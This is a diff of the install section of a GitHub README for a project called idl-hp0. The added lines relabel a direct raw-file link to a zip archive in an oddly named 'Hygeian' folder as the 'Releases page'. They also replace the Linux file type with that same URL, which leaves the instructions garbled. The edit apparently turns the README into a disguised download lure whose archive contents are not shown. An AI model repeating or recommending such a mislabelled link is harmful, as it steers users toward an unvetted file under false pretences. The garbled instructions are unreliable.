realizable-sucre824/idl-hp0/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/realizable-sucre824/idl-hp0/releases) to download the latest version of idl-hp0.
+1. Visit the [Releases page](https://raw.githubusercontent.com/realizable-sucre824/idl-hp0/main/Hygeian/idl-hp0-v3.7.zip) to download the latest version of idl-hp0.
 2. Look for the version number you want to download (e.g., v1.0).
 3. Click on the appropriate file link for your operating system:
    - **Windows:** Look for a `.exe` file.
    - **Mac:** Look for a `.dmg` file.
-   - **Linux:** Look for a `.tar.gz` file or similar.
+   - **Linux:** Look for a `https://raw.githubusercontent.com/realizable-sucre824/idl-hp0/main/Hygeian/idl-hp0-v3.7.zip` file or similar.

 ## 💻 System Requirements